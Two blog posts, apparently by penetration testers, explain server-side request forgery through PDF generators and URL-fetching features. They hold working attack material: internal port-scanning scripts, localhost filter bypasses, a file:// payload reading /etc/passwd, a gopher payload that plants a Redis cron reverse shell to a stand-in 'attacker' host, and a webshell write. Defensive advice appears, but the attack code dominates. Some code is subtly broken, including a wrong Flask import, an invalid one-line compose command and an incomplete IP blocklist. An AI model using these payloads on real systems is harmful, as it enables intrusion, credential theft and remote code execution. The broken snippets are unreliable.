Wednesday, 17 June 2026

PDF Generators: The SSRF Attack Surface You are Overlooking

PDF Generators: The SSRF Attack Surface You are Overlooking

PDF Generators: The SSRF Attack Surface You are Overlooking

You have probably tested for SSRF in standard web forms. Everyone has. You chuck a URL into an input field, point it at 169.254.169.254, and hope for the best. But what if the application does not give you a URL field at all?

Let us talk about PDF generators.

More specifically, let us talk about how a “helpful” document previewer can become our very own internal network scanner. This is a technique we have used in real engagements, and it is consistently overlooked by developers.

The Core Problem: Rendering is Just Fetching

Most modern applications that generate PDFs from user input do not magically create the document from thin air. Under the hood, they are often performing a server-side HTTP request. You give it a web page URL, the server fetches that page, and then converts the HTML into a PDF. It is a classic Server-Side Request Forgery (SSRF) scenario, but hidden inside a document generator .

If the application does not validate the URL, we can tell the server to fetch internal resources instead of external websites. The server then renders the response—often containing internal secrets or network responses—into a PDF file that we can download.

From Document Previewer to Network Scanner

We encountered an internal application that allowed users to upload a webpage URL for conversion to a PDF. By simply entering http://127.0.0.1:9732, we forced the server to make a request to a service listening on its own localhost port. The generated PDF returned the contents of that service, which included sensitive information.

This is the principle of port scanning via PDF. We systematically change the port number in the URL. If the port is open and returns a response, that response is rendered into the PDF. If the port is closed, the PDF generation times out or returns an error. By observing the server’s response times and the content of the generated PDF, we can map the internal network and identify hidden services.

The File Protocol and Local File Inclusion

Sometimes, the URL-to-PDF service is not the only vector. We also see SSRF vulnerabilities in file upload features. Imagine an application that lets us upload an HTML or XML file to be converted into a PDF. The converter parses the uploaded file and, crucially, handles resources referenced within it.

If it does not sanitise protocols, we can include a reference to local files using the file:// protocol. CVE-2025-55853 is a perfect example of this. By uploading a carefully crafted HTML file, we can force the PDF converter to read and include sensitive system files like /etc/passwd directly inside the generated PDF.

Proof of Concept Payload (CVE-2025-55853)

We can use the following HTML payload. When the application renders this to a PDF, it will include the contents of the server’s local password file:

<[i]frame src="file:///etc/passwd" height="1000px" width="1000px"> //Note: it supposedly an iframe tag, but we need to modify it so the post works

This technique transforms a file upload feature into a powerful Local File Inclusion (LFI) vulnerability, exposing credentials, configuration files, and source code.

Practical Exploitation: A Step-by-Step Approach

When we approach a PDF generator, we follow a structured methodology to turn it into a network scanner.

Step 1: Identify the Injection Point

We look for any of the following features:

  • URL-to-PDF endpoints (usually /convert?url=... or similar)
  • File upload to PDF converters (accepting HTML, XML, or Office documents)
  • RSS/Feed readers that generate PDF digests
  • Invoice or report generators that fetch logos or data from external sources

Step 2: Probe for SSRF

We start with simple tests to confirm the vulnerability:

http://127.0.0.1:8080
http://localhost:80
http://169.254.169.254/latest/meta-data/

If the server returns a PDF containing the response from these internal addresses, we have confirmed SSRF.

Step 3: Internal Network Scanning

Once we have SSRF, we can scan the internal network. We use a script to iterate through common internal IP ranges and ports, observing the server’s behaviour to identify open services.

Here is a Python snippet to automate this process. We use the requests library to interact with the PDF endpoint and measure response times for fingerprinting:

import requests
import time

target_url = "http://vulnerable-app.com/convert?url=http://"
internal_ips = [
    "10.0.0.1", "10.0.0.2", "172.16.0.1", "192.168.1.1",
    "169.254.169.254"
]
common_ports = [22, 80, 443, 3000, 5000, 5432, 6379, 8080, 9200]

def scan_ssrf(base, ip, port):
    test_url = f"{base}{ip}:{port}"
    try:
        start = time.time()
        r = requests.get(test_url, timeout=5)
        elapsed = time.time() - start

        if r.status_code < 500 and len(r.content) > 1000:  # PDFs are usually large
            print(f"[OPEN] {ip}:{port} - PDF generated in {elapsed:.2f}s")
            # Save the PDF for analysis
            with open(f"scan_{ip}_{port}.pdf", "wb") as f:
                f.write(r.content)
        elif elapsed > 2.0:
            print(f"[SLOW] {ip}:{port} - possible timeout/filter")
    except:
        pass

for ip in internal_ips:
    for port in common_ports:
        scan_ssrf(target_url, ip, port)

Step 4: Exploiting Internal Services

Identifying an open port is only half the battle. We can then exploit internal services. For example, if we find an open Redis port (6379) on an internal host, we can use the gopher:// protocol to craft requests against Redis, often leading to remote code execution via cron jobs or SSH keys.

Taming the Beast: Defensive Measures

We have seen how devastating this can be. Here is how we recommend securing your applications:

  1. Strict Input Validation: Implement an allowlist for protocols, allowing only http and https. Never permit file://, gopher://, or dict://.
  2. IP Address Blocking: Use a library to resolve the hostname to an IP address and block all private and loopback addresses (e.g., 127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). This prevents calls to internal networks.
  3. Network Segmentation: Ensure that the PDF generation service runs in an isolated environment with restricted network egress. It should not be able to reach internal infrastructure or metadata services.
  4. Regular Patching: Vulnerabilities like CVE-2025-55853 are patched by vendors. Ensure you are running the latest, most secure version of any third-party PDF conversion libraries

That is the beauty of PDF generators. They are often treated as harmless document creators, but we have shown they can be weaponised as powerful reconnaissance tools. Next time you see a document previewer, remember: it is just an SSRF in disguise.

Note: This post was written with a help from AI :)

Share:

Monday, 15 June 2026

SSRF for Breakfast: How We Made an Internal Server Dance to Our Tune

SSRF for Breakfast: How We Made an Internal Server Dance to My Tun

SSRF for Breakfast: How We Made an Internal Server Dance to Our Tune

You know that feeling when you find a feature that fetches images, documents, or webhooks from a URL you provide? Our first thought isn’t “oh neat” anymore. It’s “let us see what you really have access to.”

That’s SSRF in a nutshell. Server Side Request Forgery happens when a server trusts your URL input enough to make its own HTTP requests. And suddenly, you’re not just a regular user anymore. You’re giving orders to the server’s network card.

Let us show you what this looks like in the wild, complete with code you can test safely.

The Basic Idea

Imagine a web application that lets you set a profile picture from a URL:

POST /api/avatar HTTP/1.1
Host: coolapp.com

{
  "avatar_url": "https://images.example.com/photo.jpg"
}

The server downloads that image and stores it. Innocent, right?

But what if you give it this instead:

{
  "avatar_url": "http://169.254.169.254/latest/meta-data/"
}

That IP? That’s the AWS metadata endpoint. Only accessible from inside the cloud network. And your server is sitting right there, inside that network, happily fetching whatever you ask for.

Now you’ve got access keys, instance info, maybe even IAM credentials. All because the server didn’t ask “should I really be fetching this?”

Types of SSRF You’ll Actually Find

Basic SSRF - You see the response. The application prints the fetched data back to you. Easy mode.

Blind SSRF - The application fetches but doesn’t show you the result. You only know it worked by side effects (timing, errors, DNS logs).

Partial SSRF - You control only part of the URL, like a domain but not the path. Still dangerous. Still exploitable.

Let’s Break Something (Legally)

We set up a test lab with three containers:

  • Public web application (port 80)
  • Internal API (port 5000, no external access)
  • Redis server (port 6379, internal only)

The web application has an endpoint: GET /fetch?url=https://public.site/data

Here’s the vulnerable code (Python Flask, because we see this everywhere):

from flask import Flask, request, requests
app = Flask(__name__)

@app.route('/fetch')
def fetch_url():
    target = request.args.get('url')
    if not target:
        return "Missing url parameter", 400
    
    # Look ma, no validation!
    response = requests.get(target)
    return response.text

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

Looks fine until you realise requests.get(“http://internal-api:5000/admin”) works just fine from inside that container.

Finding SSRF Like a Pro

First, map the attack surface. Look for any feature that takes a URL and does something with it:

  • Profile picture from URL
  • Webhook endpoints
  • RSS feed importers
  • PDF generators that fetch HTML
  • Image proxies (these are gold mines)
  • Document previewers (Office file converters)
  • API testing tools built into the application

Test each one with this simple checklist:

http://example.com (normal - should work)
http://127.0.0.1:22 (check for SSH banner in response)
http://localhost:8080 (common admin ports)
http://169.254.169.254 (cloud metadata)
file:///etc/passwd (if protocol handlers are enabled)
gopher://localhost:6379/_*1%0d%0a$8%0d%0aflus[...] (Redis attacks)

The Sneaky Bypasses That Still Work

Sometimes devs block 127.0.0.1 and localhost. Cute. Try these:

http://0.0.0.0
http://localhost:[email protected]
http://2130706433 (decimal for 127.0.0.1)
http://0x7f000001 (hex)
http://127.0.0.1.nip.io (resolves to 127.0.0.1)
http://localhost. (trailing dot bypasses some regex)
http://[::1] (IPv6 localhost)
http://127.127.127.127 (redirects to 127.0.0.1 on some networks)

URL parsers are notoriously broken. Try adding @ symbols, username:password formats, even weird encodings like %68%74%74%70 (URL-encoded “http”).

Real Exploitation: Metadata is Just the Start

Cloud metadata is the classic, but let’s go deeper. Here’s a script that maps internal network from an SSRF:

import requests
import time

target_url = "http://vulnerable-app.com/fetch?url="
internal_ips = [
    "10.0.0.1", "10.0.0.2", "172.16.0.1", "192.168.1.1",
    "169.254.169.254"  # AWS metadata
]

common_ports = [22, 80, 443, 3000, 5000, 5432, 6379, 8080, 9200]

def probe_ssrf(base, ip, port):
    test_url = f"http://{ip}:{port}"
    full_url = base + test_url
    try:
        start = time.time()
        r = requests.get(full_url, timeout=3)
        elapsed = time.time() - start
        
        if r.status_code < 500:
            print(f"[OPEN] {ip}:{port} - {r.status_code} ({elapsed:.2f}s)")
            if "SSH" in r.text:
                print(f"   └─ SSH banner captured")
            return True
        elif elapsed > 1.5:
            print(f"[SLOW] {ip}:{port} - possible timeout filter")
    except:
        pass
    return False

for ip in internal_ips:
    for port in common_ports:
        probe_ssrf(target_url, ip, port)

Run this and watch the internal network reveal itself. We’ve found Jenkins servers, Redis instances, and once a whole Kubernetes API this way.

The Blind SSRF Trick That Never Fails

No response visible? No problem. Make the server hit your own box:

# Setup a simple listener
nc -lvnp 8080

# Trigger SSRF
curl "http://vulnerable.com/fetch?url=http://your-server.com:8080/test"

If nc shows a connection, you have blind SSRF. Now you can:

  1. Port scan by watching connection attempts to different ports
  2. Time attacks - port open? Connection happens faster
  3. Trigger internal endpoints even if you don’t see the output

Here’s a bash one-liner to detect open ports blindly:

for port in 22 80 443 3000 6379 8080; do 
    echo "Testing $port"
    time curl -s "http://target.com/fetch?url=http://10.0.1.5:$port" -o /dev/null
done

Compare response times. Port 80 responds fast. Port 81 times out. That’s your map.

Escalating SSRF to RCE (The Fun Part)

SSRF alone is dangerous. SSRF + internal service = game over. Let us show you two paths.

Path 1: Redis

Internal Redis often has no auth. Send raw Redis commands via SSRF using the gopher:// protocol:

import urllib.parse

# Redis command: flushall, then set a cron job
payload = """*1
$8
flushall
*3
$3
set
$1
1
$58
\n\n*/1 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'\n\n
*4
$6
config
$3
set
$10
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
"""

# URL encode for gopher
gopher_payload = "gopher://localhost:6379/_" + urllib.parse.quote(payload)

# Trigger via SSRF
requests.get(f"http://target.com/fetch?url={gopher_payload}")

This writes a cron job. A minute later, reverse shell. We’ve done this in real pentests.

Path 2: Internal API with File Write

Found an internal endpoint like http://internal-api/export?format=pdf&content=? Try path traversal:

http://target.com/fetch?url=http://internal-api/export?format=html&content=%3C%3Fphp%20system(%24_GET%5Bcmd%5D)%3B%20%3F%3E&output=/var/www/html/shell.php

If the API writes files, you just deployed a webshell.

Defenses (Because We’re Not Monsters)

If you’re building applications, stop SSRF with:

  1. Allowlist, not denylist - Specify exact domains allowed
  2. Disable redirects - requests.get(url, allow_redirects=False)
  3. Use a URL parser to rebuild the URL and reject weird protocols
  4. Bind to localhost-only for internal services with auth required
  5. Network segmentation - application servers shouldn’t reach metadata endpoints

Here’s a safe URL validator:

from urllib.parse import urlparse

def safe_fetch(user_url):
    parsed = urlparse(user_url)
    
    # Only allow http/https
    if parsed.scheme not in ['http', 'https']:
        return "Invalid protocol"
    
    # Block internal IPs
    host = parsed.hostname
    blocked = ['127.0.0.1', 'localhost', '169.254.169.254']
    if host in blocked or host.endswith('.internal'):
        return "Blocked"
    
    # Resolve DNS and check again (prevent DNS rebinding)
    import socket
    ip = socket.gethostbyname(host)
    if ip.startswith(('10.', '172.16.', '192.168.', '127.')):
        return "Blocked IP range"
    
    # Now safe to fetch
    return requests.get(user_url, timeout=5).text

Your Turn

Set up the vulnerable lab we mentioned. Docker compose makes it easy:

version: '3'
services:
  web:
    image: python:3-alpine
    command: python -c "from flask import Flask,request; import requests; app=Flask(__name__); @app.route('/fetch') def f(): return requests.get(request.args.get('url')).text; app.run(host='0.0.0.0')"
    ports:
      - "8080:5000"
  internal-api:
    image: nginx:alpine
    command: sh -c "echo 'SECRET_KEY=supersecret' > /usr/share/nginx/html/admin && nginx -g 'daemon off;'"
    
# Run: docker-compose up

Then visit http://localhost:8080/fetch?url=http://internal-api/admin and watch the secret leak.

What’s Next

Try PortSwigger’s SSRF labs - they’re free and actually challenging. Then move to HackerOne’s SSRF reports to see real bounties ($10k+ sometimes).

Next time we’ll cover SSRF via PDF generators and how to turn a document previewer into an internal network scanner. That one gets nasty.

Until then, stop trusting URLs.

Note: This post was written with a help from AI :)

Share: